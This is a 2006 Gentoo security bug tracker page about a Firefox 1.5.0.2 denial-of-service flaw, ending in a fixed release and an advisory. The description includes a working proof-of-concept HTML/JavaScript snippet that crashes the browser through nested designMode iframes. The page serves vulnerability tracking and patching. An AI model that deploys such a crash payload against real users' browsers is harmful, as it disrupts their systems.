Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug
Bug#: 131138
Alias:
Product:
Component:
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Hardware:
OS:
Version:
Priority:
Severity:
Reporter: Raphael Marichez <falco@gentoo.org>
Add CC:
CC:
Remove selected CCs
URL:
Summary:
Status Whiteboard:
Keywords:
Flags: Requestee:
 
 
  ()

Filename Description Type Creator Created Size Actions
Create a New Attachment (proposed patch, testcase, etc.) View All

Bug 131138 depends on: 132080 Show dependency tree
Bug 131138 blocks:

Additional Comments: (this is where you put emerge --info)


Not eligible to see or edit group visibility for this bug.






View Bug Activity   |   Format For Printing   |   XML   |   Clone This Bug


Description:   Opened: 2006-04-24 13:11 0000
http://archives.neohapsis.com/archives/bugtraq/2006-04/0502.html

** firefox 1.5.0.2 is already marked stable for ppc and amd64. **


------------------------------------------------------------

http://www.securident.com/vuln/ffdos.htm - PoC firefox dos


 Paste the below code snippet and view it in Firefox for DoS PoC or visit the
link above.

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo"); 
       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>

------- Comment #1 From Raphael Marichez 2006-04-24 13:13:28 0000 -------
firefox 1.0.8 is NOT affected

------- Comment #2 From Jory A. Pratt 2006-04-24 17:13:57 0000 -------
in order for this to be of importance a user must have javascript enabled,
enabling javascript globally is a mistake in itself. Bug does nothing but serve
as reference for those who might experience the javascript bug.

------- Comment #3 From Sune Kloppenborg Jeppesen 2006-04-24 21:37:04 0000 -------
AFAIR it is enabled by default in 1.5.

------- Comment #4 From Carsten Lohrke 2006-04-25 10:19:56 0000 -------
(In reply to comment #2)
> in order for this to be of importance a user must have javascript enabled,
> enabling javascript globally is a mistake in itself. Bug does nothing but serve
> as reference for those who might experience the javascript bug.

Personally I wouldn't even disagree, but I know there are enough who would,
since there are too much broken websites not working (properly) without
Javascript. Not too long ago even our bugzilla help page was not reachable
without it. And expecting Joe user to take care about a problem, he usually is
not even aware about, is not realistic anyways.

------- Comment #5 From Lars Wendler (Polynomial-C) 2006-04-25 12:48:06 0000 -------
seamonkey seems to be affected, too...

------- Comment #6 From Thierry Carrez (RETIRED) 2006-04-28 11:15:16 0000 -------
Can't find an upstream bug for this.
Setting to A because we can assume almost everyone keeps JavaScript enabled.

------- Comment #7 From Sascha Geschwandtner 2006-04-30 07:59:44 0000 -------
(In reply to comment #4)
> Personally I wouldn't even disagree, but I know there are enough who would,
> since there are too much broken websites not working (properly) without
> Javascript.

Being a big fan of the NoScript extension, I agree.
Like bugs.gentoo.org, for example (quicksearch).

(In reply to comment #6)
> Can't find an upstream bug for this.
> Setting to A because we can assume almost everyone keeps JavaScript enabled.

https://bugzilla.mozilla.org/show_bug.cgi?id=334515

------- Comment #8 From Jory A. Pratt 2006-05-02 16:10:30 0000 -------
1.5.0.3 is in the tree mark it stable, amd64 do not forget -bin.

------- Comment #9 From Jory A. Pratt 2006-05-02 19:29:10 0000 -------
ff-1.5.0.3 source stable, leaving amd64 alias until -bin is stablized.

------- Comment #10 From Thomas Cort (RETIRED) 2006-05-02 20:18:26 0000 -------
mozilla-firefox-bin-1.5.0.3 stable on amd64.

------- Comment #11 From Lars Weiler (RETIRED) 2006-05-03 07:15:43 0000 -------
www-client/mozilla-firefox-1.5.0.3 stable on ppc.  No -bin-pkg available.

------- Comment #12 From Raphael Marichez 2006-05-05 11:10:17 0000 -------
Drafting...

bug 132080 might be not new. What's the policy in this case ? We're waiting
before sending GLSA or not ?

------- Comment #13 From Thierry Carrez (RETIRED) 2006-05-06 10:19:59 0000 -------
Yes, that's probably an old bug.
GLSA 200605-06 done.

Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug